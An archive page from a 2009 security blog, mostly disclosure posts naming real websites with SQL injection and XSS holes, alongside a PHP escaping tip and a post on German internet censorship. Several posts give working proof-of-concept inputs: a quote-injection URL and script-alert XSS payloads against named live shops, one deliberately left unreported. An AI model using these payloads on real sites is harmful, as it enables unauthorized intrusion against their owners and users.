Archive for June, 2009

h1

Googles PHP performance tips – What about security?

June 25, 2009

Today Travis Biehn has posted a link to the Full Disclosure Mailinglist leading to Googles “PHP performance tips“.

Don’t copy variables for no reason.

Sometimes PHP novices attempt to make their code “cleaner” by copying predefined variables to variables with shorter names. What this actually results in is doubled memory consumption, and therefore, slow scripts. In the following example, imagine if a malicious user had inserted 512KB worth of characters into a textarea field. This would result in 1MB of memory being used!

BAD:
$description = $_POST[‘description’];
echo $description;

GOOD:
echo $_POST[‘description’];

Complement from me:

MUCH BETTER:
echo htmlspecialchars($_POST[‘description’], ENT_QUOTES);

😉

h1

SQL Injection: barrysclipart.com

June 21, 2009

Uhhh, thats nice…

Free Image Hosting at www.ImageShack.us

http://www.barrysclipart.com/barrysclipart.com/showgallery.php?cat=172’&thumb=1

I’ve tried to send an email to ‘satellites@jupiterimages.com’ which is linked to the contact button, but all i got back was this:

Final-Recipient: rfc822;satellites@jupiterimages.com
Action: failed
Status: 5.7.1
Diagnostic-Code: smtp;550 5.7.1 RESOLVER.RST.AuthRequired; authentication required

A whois on this domain shows me the email address stacy.blume@gettyimages.com. So i have send a quick notice to her. Let’s see if I will get an answer…

h1

XSSed: move-ya.com

June 21, 2009

I had a little break, and found a new shop with xss holes in it: move-ya.com

Free Image Hosting at www.ImageShack.us

http://www.move-ya.com/shop/html/detailsearch/DetailSearch_Re105.php?W0=%22%3E%3Cscript%3Ealert(%27xss%27);%3C/script%3E&W1=&W2=&W3=

I’ve send an email to them…

h1

Internet censorship in germany

June 21, 2009

Germany is on the verge of censoring its Internet: The government – a grand coalition between the German social democrats and conservative party – seems united in its decision: On Thursday the parliament is to vote on the erection of an internet censorship architecture.

The Minister for Family Affairs Ursula von der Leyen kicked off and lead the discussions within the German Federal Government to block Internet sites in order to fight child pornography. The general idea is to build a censorship architecture enabling the government to block content containing child pornography. The Federal Office of Criminal Investigation (BKA) is to administer the lists of sites to be blocked and the internet providers obliged to erect the secret censorship architecture for the government.

Image Hosted by ImageShack.us

Netzpolitik.org: The Dawning of Internet Censorship in Germany

*no comment*

EDIT: Here is the ePetition System of the german government: Internet – Keine Indizierung und Sperrung von Internetseiten

Isn’t it funny that they use SMF 1.1.9 to build an e-Petition system? Maybe someone should have a closer look at it… 😉

h1

XSSed: softerpore.com

June 21, 2009

New blog, new xss…
Today i found an internet shop which is doing a lot of comment spamming in blogs etc… -> http://www.softerpore.com
It does not took long to find an xss hole in the registration page:
Just post
fname=%22%3E%3CSCrIPT%3Ealert%28%22Yes%2C+I%27m+vulnerable+to+XSS%22%29%3C%2FSCrIPT%3E&lname=&mail=&send=Create+Account
to http://www.softerpore.com/registration/

Or enter
"><SCrIPT>alert("Yes, I'm vulnerable to XSS")</SCrIPT>
to the inputbox you want it to be.

Free Image Hosting at www.ImageShack.us

And no… I will not give damn spammers a link to their website, you have to copy & paste… And in this case I will not send a notice to the administrator. He has enough to do with spamming etc, i don’t want to disturb him…